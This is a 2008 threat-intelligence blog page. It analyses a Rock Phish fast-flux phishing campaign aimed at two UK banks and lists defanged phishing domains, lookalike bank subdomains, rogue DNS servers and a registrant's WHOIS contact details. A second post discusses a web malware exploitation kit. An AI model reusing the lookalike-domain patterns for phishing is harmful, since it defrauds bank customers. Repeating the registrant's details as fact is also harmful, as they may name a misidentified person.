Dancho Danchev's Blog - Mind Streams of Information Security Knowledge: 12/02/08

Tuesday, December 02, 2008

Rock Phish-ing in December

Nothing can warm up the heart of a security researcher better than a batch of currently active Rock Phish domains, fast-fluxing by using U.S based malware infected hosts as infrastructure provider. What is this assessment of currently active Rock Phish campaign aiming to achieve? In short, prove that the people that were Rock Phish-ing at the beginning of the year, are exactly the same people that continue Rock Phish-ing at the end of the year, thereby pointing out that as long as they're not where they're supposed to be, they are not going to stop innovating and working on a higher average online time for their campaigns.

What's particularly interesting about this campaign, is that compared to previous ones targeting multiple brands, the thousands of malware infected hosts and domains are targeting Alliance & Leicester and Abbey National only.

Active Rock Phish Domains in fast-flux :
stgsfw7sr .com
q06ciwt60 .com
jnlyf96v4 .com
neegzlh35 .com
7azwmrsg5 .com
pn3ekq976 .com
2coxi8sb6 .com
d8ri1iz5d .com

ki7wvgauf .com
5nt5r3keh .com
5nt29884j .com
bgoryomek .com
a725jv8ik .com
fke5nnp8m .com
stgsfw7sr .com
10c0ka49t .com
zp304ju3z .com
j0rykafwn .cn
2j1f .net

confirm-updates .com
paypal.confirm-updates .com
user-data-confirmation .com
paypal.user-data-confirmation .com
capitalone.updating-informations .com

Sample sub-domain structure :
mybank.alliance-leicester.co.uk.7azwmrsg5 .com
mybank.alliance-leicester.co.uk.bgoryomek .com
mybank.aliance-leicester.co.uk.stgsfw7sr .com
mybank.alliance-leicester.co.uk.zp304ju3z .com
mybank.alliance-leicester.co.uk.5nt29884j .com
mybank.aliance-leicester.co.uk.bgoryomek .com
mybank.alliance-leicester.co.uk.bgoryomek .com
mybank.aliance-leicester.co.uk.stgsfw7sr .com
mybank.alliance-leicester.co.uk.stgsfw7sr .com
mybank.aliance-leicester.co.uk.zp304ju3z .com
mybank.alliance-leicester.co.uk.zp304ju3z .com
myonlineaccounts2.abbeynational.co.uk.pn3ekq976 .com
myonlineaccounts1.abeynational.com.pn3ekq976 .com

DNS servers for the campaigns :
ns1.thecherrydns .com
ns2.thecherrydns .com
ns3.thecherrydns .com
ns4.thecherrydns .com
ns5.thecherrydns .com
ns6.thecherrydns .com

ns10.realgoodnameserver .com
ns1.realgoodnameserver .com
rens2.realgoodnameserver .com
rns3.realgoodnameserver .com
ns4.realgoodnameserver .com
ns8.realgoodnameserver .com

ns6.myboomdns .com
ns4.myboomdns .com

Domains registrant :
Name : Pan Wei wei
Organization : Pan Wei wei
Address : BaoChun Rd. 27, No. 3, 1F, Apt. 1903
City : Bejing
Province/State : Beijing
Country : CN
Postal Code : 100176
Phone Number : 010-010-58022118-58022118
Fax : 86-010-58022118-58022118
Email : 127@126.com

These well known Rock Phish campaigners, have been naturally multitasking on several different underground fronts throughout the year. For instance, their 2j1f .net is known to have been hosting money mule company's site, and also, it was used in a previously analyzed phishing campaign that was spreading across Facebook in June. Need more evidence on the consolidation that's been ongoing for over an year and half now? An infamous money mule recruiting company (Cash-Transfers Inc.) was also taking advantage of the fast-flux network offered by the ASProx botnet masters in July.

As a firm believer in that "the whole is greater than the sum of its parts", the popular "sitting duck" cybercrime infrastructure hosting model will be either replaced by a cybercrime infrastructure relying entirely on legitimate services, or one where the average malware infected Internet user would be temporarily used as a hosting provider.

If millions were made by using the "sitting duck" hosting model, how many would be made using the others, given that they would inevitably increase the average online time for a malicious campaign?

Related Rock Phish research :
209 Host Locked
209.1 Host Locked
66.1 Host Locked
Confirm Your Gullibility
Assessing a Rock Phish Campaign

Related fast-flux research :
Fast-Flux Spam and Scams Increasing
Fast Fluxing Yet Another Pharmacy Scam
Storm Worm's Fast Flux Networks
Managed Fast Flux Provider
Managed Fast Flux Provider - Part Two
Obfuscating Fast Fluxed SQL Injected Domains
Storm Worm Hosting Pharmaceutical Scams
Fast-Fluxing SQL injection attacks executed from the Asprox botnet

Dancho Danchev

Independent Security Consultancy, Threat Intelligence Analysis (OSINT/Cyber Counter Intelligence) and Competitive Intelligence research on demand. Insightful, unbiased, and client-tailored assessments, neatly communicated in the form of interactive reports - because anticipating the emerging threatscape is what shapes the big picture at the end of the day. Approach me at dancho.danchev@hush.com

Yet Another Web Malware Exploitation Kit in the Wild

With business-minded malicious attackers embracing basic marketing practices like branding, it is becoming increasingly harder, if not pointless to keep track of all XYZ-Packs currently in circulation. How come? Due to their open source nature allowing modifications, claiming copyright over the modified and re-branded kit, the source code of core web malware exploitation kits continue representing the foundation source code for each and every newly released kit.

In fact, the practice is becoming so evident, that anecdotal evidence in the form of monitoring ongoing communications between sellers and buyers reveals actual attempts of intellectual property enforcement in the form of exchange of flames between an author of a original kit, and a newly born author who seems to have copied over 80% of his source code, changed the layout, re-branded it, added several more exploits and started pitching it as the most exclusive kit there is available in the underground marketplace.

What's new about this particular kit anyway? Changed iframe and js obfuscation techniques, doesn't require MySQL to run, with several modified Adobe Acrobat and Flash exploits - all patched and publicly obtainable. This is precisely where the marketing pitch ends for the majority of malware kits released during the last quarter.

As always, there are noticable exceptions to the common wisdom that time-to-underground market isn't allowing them to innovate, but thankfully, these exceptions aren't yet going mainstream. What is going to change in the upcoming 2009? Web malware exploitation kits are slowly maturing into multi-user cybercrime platforms, where traffic management coming from the SQL injected or malware embedded sites is automatically exploited with access to the infected hosts or to the traffic volume in general offered for sale under a flat rate, or on a volume basis.

Converging traffic management with drive-by exploitation and offering the output for sale, all from a single web interface, is precisely what malicious economies of scale is all about.

Related posts:
Cybercriminals release Christmas themed web malware exploitation kit
New Web Malware Exploitation Kit in the Wild
Modified Zeus Crimeware Kit Gets a Performance Boost
Zeus Crimeware Kit Gets a Carding Layout
Web Based Malware Emphasizes on Anti-Debugging Features
Copycat Web Malware Exploitation Kit Comes with Disclaimer
Web Based Malware Eradicates Rootkits and Competing Malware
Two Copycat Web Malware Exploitation Kits in the Wild
Copycat Web Malware Exploitation Kits are Faddish
Web Based Botnet Command and Control Kit 2.0
BlackEnergy DDoS Bot Web Based
A New DDoS Malware Kit in the Wild
The Small Pack Web Malware Exploitation Kit
The Nuclear Grabber Kit
The Apophis Kit
Nuclear Malware Kit
The Random JS Malware Exploitation Kit
Metaphisher Malware Kit Spotted in the Wild

Dancho Danchev